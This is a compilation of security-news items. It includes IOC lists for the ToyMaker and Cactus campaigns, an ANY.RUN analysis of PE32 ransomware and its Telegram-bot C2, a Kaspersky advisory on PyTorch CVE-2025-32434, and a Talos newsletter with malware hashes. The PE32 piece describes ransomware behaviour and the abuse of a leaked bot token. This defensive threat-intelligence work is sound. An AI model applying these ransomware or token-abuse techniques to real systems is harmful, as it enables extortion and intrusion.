Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

Hashes – LAGTOY

fdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be3826

Metasploit shells

0a367cc7e7e297248fad57e27f83316b7606788db9468f59031fed811cfe4867

0bcfea4983cfc2a55a8ac339384ecd0988a470af444ea8f3b597d5fe5f6067fb

5831b09c93f305e7d0a49d4936478fac3890b97e065141f82cda9a0d75b1066d

691cc4a12fbada29d093e57bd02ca372bc10968b706c95370daeee43054f06e3

70077fde6c5fc5e4d607c75ff5312cc2fdf61ea08cae75f162d30fa7475880de

a95930ff02a0d13e4dbe603a33175dc73c0286cd53ae4a141baf99ae664f4132

c1bd624e83382668939535d47082c0a6de1981ef2194bb4272b62ecc7be1ff6b

Network IOCs

ToyMaker

209[.]141[.]43[.]37

194[.]156[.]98[.]155

158[.]247[.]211[.]51

39[.]106[.]141[.]68

47[.]117[.]165[.]166

195[.]123[.]240[.]2

75[.]127[.]0[.]235

149[.]102[.]243[.]100

Cactus

206[.]188[.]196[.]20

51[.]81[.]42[.]234

178[.]175[.]134[.]52

162[.]33[.]177[.]56

64[.]52[.]80[.]252

162[.]33[.]178[.]196

103[.]199[.]16[.]92

Cisco Talos Blog – ​Read More

Will super-smart AI be attacking us anytime soon?

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

WeLiveSecurity – ​Read More

Year in Review: Attacks on identity and MFA

Year in Review: Attacks on identity and MFA

For our third focussed topic for Talos’ 2024 Year in Review, we tell the story of how identity has become the pivot point for adversarial campaigns.

The main themes of this story are credential abuse, Active Directory exploits, and MFA workarounds. Valid account details was the #1 way attackers got in, and nearly half of identity attacks involved poking at AD. We also look at common MFA missteps (like no enrollment or misconfigured policies) and break down how attackers are bypassing protections with techniques like push fatigue and password spraying.

Take a look at this short but data-rich overview of identity attacks. For defenders, it may be able to help you to identify gaps in MFA implementations, understand the operational tradecraft attackers are using post-authentication, and how to align your defenses with what’s being seen in the wild.

For a 60 second overview, have a watch of this video:

For the full analysis, download Talos’ 2024 Year in Review today.

Cisco Talos Blog – ​Read More

PE32 Ransomware: A New Telegram-Based Threat on the Rise 

Editor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can find Mauro on X. 

There’s no shortage of ransomware these days. It’s everywhere, lurking in email attachments, hiding in cracked software, and making headlines almost daily. While some ransomware groups vanish or rebrand, new names step in to take their place, keeping security teams in a constant state of alert. 

One of the latest strains making the rounds is PE32 Ransomware, a newcomer that’s quickly gaining attention online, including on Twitter. Despite its amateur execution, it manages to encrypt files, communicate over Telegram, and cause real damage.

 PE32: Key Takeaways 

Image 1. PE32 Ransomware running on Windows 10 inside ANY.RUN’s Interactive Sandbox

In this report, Mauro Eldritch takes a closer look at how PE32 works, how it communicates, and why its chaotic behavior still poses a real threat. 

  • Fast encryption: Starts encryption after a simple prompt; targets visible folders like Desktop. 
  • Unique ransom setup: Two payment tiers: one to unlock files, another to stop data leaks. 
  • Telegram C2: Communicates entirely via Telegram Bot API; bot token is exposed in the code. 
  • Messy & loud: Drops marker files, triggers disk repair, and encrypts even useless files. 
  • No stealth: No obfuscation or evasion tricks; relies on basic Windows libraries. 
  • Immature but active: Still evolving, but already a threat due to poor security hygiene. 

Execution Flow and Initial Behavior 

Image 2. Desktop files encrypted with pe32s extension

When executed, the sample waits for the operator’s input to determine whether it should encrypt only the folder where it was dropped or the entire system (see Image 2).

View sandbox analysis 

Image 3. PE32-KEY folder

However, regardless of this selection, it immediately starts noisily encrypting the most visible locations, such as the desktop, appending the .pe32s extension (see Image 3). 

Encrypted Desktop files with .pe32s extension 

Instead of dropping a ransom note directly onto the Desktop (as most ransomware does), PE32 creates a folder named PE32-KEY in the root of the C: drive. This folder contains several internal files used during execution: 

  • context.pe32c, lock.pe32, pe32lockfile.lock – for internal tracking and state 
Image 4. PE32 Ransom Note
  • ID – stores the victim’s unique identifier 
  • README.txt – the actual ransom note 

Speed up and simplify analysis of malware and phishing threats with ANY.RUN’s Interactive Sandbox 



Sign up with business email


PE32 ransom note 

The ransom note stands out for its two-tiered payment model: one fee to unlock encrypted files, and another to prevent stolen data from being leaked. This approach differs from most ransomware strains, which typically bundle both into a single payment.  

Prices vary widely: 

  • $700 to $7,000 for individual machines or servers 
  • $10,000 to 2 BTC (or more) for corporate targets 

Victims are instructed to reach out via Telegram. If that fails, the attackers provide a Gmail address as a backup contact method, another sign of their operational inexperience. 

Image 5. Communication to Telegram Admin Group Chat, revealing Bot Token and Group ID

Telegram C2: Loud, Exposed, and Easy to Abuse 

Once PE32 finishes prompting the attacker for encryption scope, it hides its process window and shifts to background mode. From there, it begins broadcasting its activity to a hardcoded Telegram group via the Bot API. 

The first message looks like this: 

”[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:44:39] []  

NEW RUN ID: 58994073AC147486]”

If using Telegram as a C2 channel wasn’t already an OPSEC disaster, the actors also expose their Bot Token and Group Chat ID. 

Image 6. Communication to Telegram Admin Group Chat stating the encryption cycle status 

The malware then begins reporting its lifecycle to the Telegram group, detailing every step of its execution, as seen below:[Text Wrapping Break] 

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:45:07] [58994073AC147486] 

Staring UltraFast Round C:\”

PE32 struggles to process certain files (or their extensions—misspelled as “extentions” in its messages): 

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:47:08] [58994073AC147486] 

Unknown Extentions:  

[...] 

odbc: 1 0MB 

en_gb_e: 1 0MB 

fr_fr_p: 1 0MB 

xls4: 1 0MB 

xls6: 1 0MB 

xsx: 1 0MB 

nettcp: 1 0MB 

xls8: 1 0MB 

access: 1 0MB”

The encryption cycle concludes with three messages. The first one confirms that the “UltraFast” cycle has been completed, followed by two more messages indicating that the “Fast” and “Slow” cycles have also finished successfully. 

“[PE32 v4.0.1] [Armin] [Thu, 20 Feb 2025 17:47:08] [58994073AC147486] 

UltraFast Compeleted C:\”
Image 7. All communication is restricted to Telegram 

With no observable DNS or HTTP requests, we can confirm that this strain of PE32 Ransomware relies exclusively on Telegram Bots for communication. This tactic is commonly observed in the MaaS scene, particularly with certain Stealers, but is rarely used in the RaaS ecosystem. 

Image 8. ANY.RUN’s CFG option in action

CFG Dumping with ANY.RUN 

ANY.RUN’s Interactive Sandbox provides a CFG extraction function, allowing analysts to inspect the malware’s internal configuration. Unsurprisingly, the Telegram Bot Token is scattered throughout the code, making it trivially easy to trace the adversarial infrastructure—it’s almost impossible to miss, even by accident. 

Armed with this token, anyone can easily flood the attacker’s C2 with fake requests or worse, use the bot’s key to impersonate the bot and send messages to any Telegram user. 

By feeding the bot token into third-party tools like Matkap, threat hunters can automate the retrieval of all data exchanged through the bot, ranging from communications to encrypted files, and even victims’ encryption or decryption keys, as long as they were sent to or received from the bot. 

Image 9. Recon routines on PE32 

A Chaotic Codebase 

Beyond its network behavior, PE32 operates like a typical ransomware strain. It collects system information such as the computer’s GUID, hostname, software policy settings, and supported languages, a common technique used to avoid infecting machines in specific regions, likely to minimize legal consequences. 

Image 10. False (but not false) positives arise from PE32’s chaotic behavior

PE32’s untidy nature makes it somewhat difficult to read and profile. For instance, it places a file named “pe32lockfile.lock” in every locked folder, likely as a flag indicating “I was here already.” 

But when dropping the “pe32lockfile.lock” file in directories like the ones belonging to Skype, Firefox or Chrome, it trips a good portion of detection rules, so it’s a behaviour worth nothing. 

Image 11. PE32’s reckless encryption cycle triggers chkdsk.exe to run

The chaos doesn’t stop there. PE32 also drops C:bootTel.dat, a legitimate Windows telemetry file associated with chkdsk.exe (Disk Checker). Although harmless on its own, the creation of this file is directly tied to the ransomware’s activity. 

By aggressively encrypting files across the C: drive, including non-critical system files, PE32 ends up triggering the disk repair utility. While it doesn’t halt system functionality, it does cause Windows to initiate self-repair checks, providing an additional footprint of the malware’s presence. 

With this, we now have additional indicators of PE32’s activity. 

Image 12. Useless files being encrypted, such as Chrome language files for Portuguese, Romanian and Russian

PE32 shows no logic in file selection. It encrypts everything in sight, regardless of extension or value. Chrome’s language packs (messages.json), static resources like .gif and .css files, and even incomplete extension data are all locked without discrimination. 

Image 12. ANYRUN allows to inspect libraries loaded and unloaded by a malware process 

On the technical side, PE32 keeps things simple. There’s no use of exotic libraries or obfuscated function calls. It relies on the classic combo of ntdll.dll and kernel32.dll to execute processes and manipulate files, while crypt32.dll and bcrypt.dll handle encryption.

Image 13. ANYRUN automatic ATT&CK Matrix

It depends on schannel.dll, Windows’ native TLS/SSL to reach its C2 channel using HTTPS, and that’s it. Plain and simple! 


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

Follow along a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



TTPs & IOCs 

Dissecting PE32 is challenging due to its unpredictable and erratic behavior. The ransomware triggers numerous detections, some legitimate, others the result of its careless execution, which can complicate analysis and lead to false trails. 

Fortunately, ANY.RUN’s automatic ATT&CK matrix and IOC collection make this task significantly easier. These features help analysts quickly identify behaviors and map them to known techniques, significantly reducing investigation time. 

Image 14. Telegram communication inside ANYRUN’s ATT&CK Matrix

One of the most notable techniques observed is T1102 – Web Service Communication, specifically communication via Telegram. Although not the most advanced tactic, it provides a clear indication of PE32’s reliance on a basic and exposed C2 channel. 

Image 16. PE32 encrypting Skype folder as seen by ANYRUN’s ATT&CK Matrix 

This behavior aligns with early-stage or poorly maintained ransomware, which typically lacks data exfiltration capabilities and instead focuses solely on encryption and basic status reporting. In this context, T1102 serves as a valuable early signal for identifying similar threats in the wild. 

PE32 Threat Impact 

The PE32 ransomware campaign introduces notable risks despite its unsophisticated design: 

  • For end users: Victims face potential data loss, system instability, and financial pressure from ransom demands. The dual-payment model adds further psychological manipulation by threatening data exposure. 
  • For organizations: While PE32 currently lacks data exfiltration, its ability to disrupt operations, encrypt shared resources, and leave behind recoverable indicators (e.g., lock files, telemetry triggers) makes it a growing concern, especially if it evolves. 
  • For security teams: The use of Telegram as a C2 channel, combined with erratic behavior and non-selective encryption, can complicate detection and response. Its reliance on public communication channels also introduces new monitoring and containment challenges. 
  • For the broader threat landscape: PE32 highlights a trend toward low-effort, fast-deploy ransomware strains, crafted with minimal obfuscation, relying on common tools, yet still capable of causing damage. Its open infrastructure and careless coding make it accessible for copycats and opportunistic attackers. 

Conclusion 

The analysis of PE32 Ransomware reveals how even basic, poorly coded malware can disrupt systems, encrypt valuable data, and leverage public platforms like Telegram for command and control.  

While it lacks advanced evasion or data theft capabilities, PE32 reflects the growing trend of fast-deploy, low-effort ransomware strains that still pose a real threat to individuals and organizations. 

By analyzing PE32 in real time using ANY.RUN’s Interactive Sandbox, we were able to fully observe its execution flow, uncover its communication channels, and extract key artifacts, without relying solely on static reverse engineering. 

Here’s how this kind of analysis brings value: 

  • Faster threat detection: Catch suspicious encryption activity and exposed infrastructure early. 
  • Full behavioral visibility: Monitor system changes, communication attempts, and encryption logic in real time. 
  • Reduced investigation time: Quickly correlate observable behavior with known techniques and IOCs. 
  • Improved incident response: Collect and share actionable indicators across teams. 
  • Stronger threat intelligence: Identify attacker mistakes, such as hardcoded credentials and bot tokens. 

Try ANY.RUN’s Interactive Sandbox today 

Collect Indicators of Compromise

SHA256:15cb6bd05a35fdbd9a7e53b092a1b0537c64cb5df08ee0262479c0cc24eafd8a 

FilePath:C:PE32-KEYID 

SHA256:5946bdeb8b7bf0603e99cefb15c083a37352fa8a916b2664bbb9f9027f44985b 

FilePath:C:PE32-KEYREADME.txt 

SHA256:c6ddc9c2852eddf30f945a50183e28d38f6b9b1bbad01aac52e9d9539482a433 

Filename:PE32.exe 

SHA256:098ee778fca1bfd809499dac65f528ea727f2aee9c6eaf79fe662d9261086e4a 

FilePath:C:PE32-KEYcontext.pe32c 

SHA256:9e561018034479df1493addca30f1d031b9185e1d66f15333b8ea79d16acf64b 

FilePath:C:PE32-KEYlock.pe32 

References

Matkap tool: github.com/0x6rss/matkap 

Sandbox analysis: https://app.any.run/tasks/58b336b0-baec-48bb-9675-b2f3d352b63c

The post PE32 Ransomware: A New Telegram-Based Threat on the Rise  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Update PyTorch ASAP | Kaspersky official blog

A researcher has discovered a vulnerability in PyTorch, an open-source machine learning framework. The vulnerability, registered as CVE-2025-32434, belongs to the Remote Code Execution (RCE) class and has a 9.3 CVSS rating, meaning it is categorized as critical. Exploitation of CVE-2025-32434 under certain conditions allows an attacker to run arbitrary code when malicious AI model is being loaded on the victim’s computer. Anyone using PyTorch is advised to update the framework to the latest version as soon as possible.

The CVE-2025-32434 vulnerability

The PyTorch framework, among other things, allows users to save trained models to a file that stores the weights. And, of course, load them from the file using the torch.load() function. Trained models are often shared via various public repositories and, theoretically, they may contain malicious implants. Therefore, the official documentation of the PyTorch project recommends using the torch.load() function with the weights_only=True parameter for security purposes (this way, only primitive data types are loaded: dictionaries, tensors, lists, and so on).

The vulnerability CVE-2025-32434 exists due to an incorrectly implemented deserialization mechanism when loading a model. The researcher who discovered it, demonstrated that an attacker can create a model file in such a way that the weights_only=True parameter will lead to the exact opposite effect —while loading of this malicious model will lead to arbitrary code execution that can compromise the environment in which the model is run.

How to stay safe?

The researcher did not publish a detailed method for exploiting this vulnerability, and at the moment there is no evidence that someone is using CVE-2025-32434 in real attacks. However, the very fact of releasing a patch always attracts both researchers and attackers to the problem, so proof-of-concept exploits are most likely already being developed.

The team responsible for developing the PyTorch framework released update 2.6.0, in which the vulnerability CVE-2025-32434 was successfully fixed. All previous versions, up to 2.5.1, remain vulnerable and should be updated as soon as possible. If this is not possible for some reason, then researchers recommend to refrain from using the torch.load() function with the weights_only=True parameter and temporarily switch to alternative methods of model loading.

In addition, we recommend paying special attention to protecting virtual and cloud environments – this is easiest to do using specialized solutions.

Kaspersky official blog – ​Read More

CapCut copycats are on the prowl

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

WeLiveSecurity – ​Read More

Care what you share

Care what you share

Welcome to this week’s edition of the Threat Source newsletter. 

As we navigate our daily routines, certain tasks become second nature to us, especially if they are integral to our professions. However, what feels instinctive to one person might be foreign to another. This disparity is akin to a skilled musician effortlessly playing a complex melody, while someone without musical training might appreciate the beauty of the music in a different way. Both may enjoy music, but they experience it from different perspectives. 

Lately, I’ve found myself thinking about these differences in the context of online interactions, particularly with search engines. I’ve become increasingly frustrated with how they try to influence my buying behavior or try to “enhance” search results with AI. It’s often unsuccessful, as many of you have experienced. I once looked up something for my father-in-law and got swamped for weeks after with advertisements absolutely irrelevant to me. 

It’s easy to overlook that when using a search engine, the exchange of knowledge is not one-sided. It’s not only users who gain knowledge from indexed content, but search engines also acquire detailed insights into user behavior and preferences. You may unknowingly share sensitive information that could be stored for extended periods or shared with third parties for advertising or other purposes. I tried to get around this by shifting to privacy-focused search engines but wasn’t happy with the experience, either because of smaller or different indexes, or I was missing results in my native language. 

Luckily, I came across an open-source project called SearXNG, a “free internet metasearch engine which aggregates results from up to 229 search services. Users are neither tracked nor profiled.” 

I like it for three reasons: 

  1. You can try one of the public instances and check if you like it before you go all-in.
  2. You can self-host it on bare metal, in Docker or LXC, giving you even more control over your data. 
  3. With Opensearch it seamlessly integrates with your existing browser. 

It took me a couple of days to get used to it, but I do really like it now. It’s not perfect, but it is a real timesaver. As a bonus, the search syntax for advanced use is easy to memorize: 

  • “:en”, “:de” or “:fr” to search in a given language 
  • “!social_media” or “!news” to search just a given category 

The same principle applies to the increasing number of AI and large language models (LLMs) that process your queries — they also gather information about you. There are initiatives like Perplexica on GitHub that aim to bridge the gap for AI-assisted searches, although I haven’t explored them in detail. Additionally, if your interactions extend beyond simple searches to more profound inquiries, such as asking an LLM about the meaning of life, it’s wise to first assess the trustworthiness of the engine or the company behind it. Care what you share.

The one big thing 

We are continuing our discussion of Talos’ 2024 Year in Review report, looking at each section in detail. This week, let’s examine ransomware.

Why do I care? 

Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of related cases.  

Ransomware actors exploited public-facing applications nearly 20% of the time. The Known Exploited Vulnerabilities Catalog for 2024 lists 28 out of 186 Vulnerabilities as “Known to be used in Ransomware Campaigns” with CVE ID’s all the way from 2012-2024 (except for 2015).

So now what? 

These are major risks which can be mitigated by applying basic cyber hygiene principles. Please update and patch your software, and protect your credentials. Tune in next week to learn about multi-factor authentication (MFA) and identity threats, and why you need to do more than just enable MFA.

Top security headlines of the week 

  • OpenAI cuts safety tests in “reckless” AI push. According to the article, testing has gone down from six months to just days. We all know that even with six months of testing any model, it’ll never be quite perfect. (MSN) Further compounding this: 
  • AI-hallucinated code dependencies become new supply chain risk. “Slopsquatting” (as a spin on typosquatting) has become a thing. Threat actors can check with one or more AI models what packages they hallucinate and upload their malicious ones to PyPI or npm. (BleepingComputer)
  • Windows Recall seems to be back again. More privacy-related news. If I recall (pun intended) correctly, in May last year Microsoft introduced Recall — a feature which constantly takes screenshots, indexes them, and makes them searchable for you. After huge backslashes in the community, and the creation of tools like TotalRecall, Microsoft paused the launch last June. (BleepingComputer)
  • The 25-year-old CVE program seemed to be at risk. MITRE warned on April 15 that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program expired on April 16. This was big. Just in Q1 about 11,781 vulnerabilities were added (with 415 rejected) to the Database. Stopping this would have caused a lot of trouble. (Krebs on Security) However, the Cybersecurity and Infrastructure Security Agency (CISA) announced that it had exercised an option to extend MITRE’s contract—reportedly for another 11 months, according to multiple sources.

Can’t get enough Talos? 

  • Unmasking the new XorDDoS controller and infrastructure. Cisco Talos observed the ongoing global spread of the XorDDoS malware, predominantly targeting the United States, with evidence suggesting Chinese-speaking operators are using sophisticated tools to orchestrate widespread attacks. 
  • Talos Takes: Year in Review Special (Pt. 2). Azim Khodjibaev and Lexi DiScola join Hazel to discuss some of the most prolific ransomware groups (and why LockBit may end this year very differently to how they ended 2024).

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week  

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe   
Detection Name: Win.Worm.Bitmin-9847045-0 

SHA256: 2e964c017df8b7d56600a5d68018f9f810a1c7dd3da800b5b5dfe85e9ce6b385 
MD5: 01b521c78f5bbdaba0cc221bc893e2b8 
VirusTotal: https://www.virustotal.com/gui/file/2e964c017df8b7d56600a5d68018f9f810a1c7dd3da800b5b5dfe85e9ce6b385 
Typical Filename: toyboy.exe   
Detection Name: Gen:Variant.Tedy.758566 

SHA256: 2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277 
MD5: 42c016ce22ab7360fb7bc7def3a17b04 
VirusTotal: https://www.virustotal.com/gui/file/2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277 
Typical Filename: Rainmeter-4.5.22.exe  
Detection Name: Artemis!Trojan 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   
MD5: 7bdbd180c081fa63ca94f9c22c457376   
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Typical Filename: IMG001.exe  
Detection Name: Win.Trojan.Miner-9835871-0 

Cisco Talos Blog – ​Read More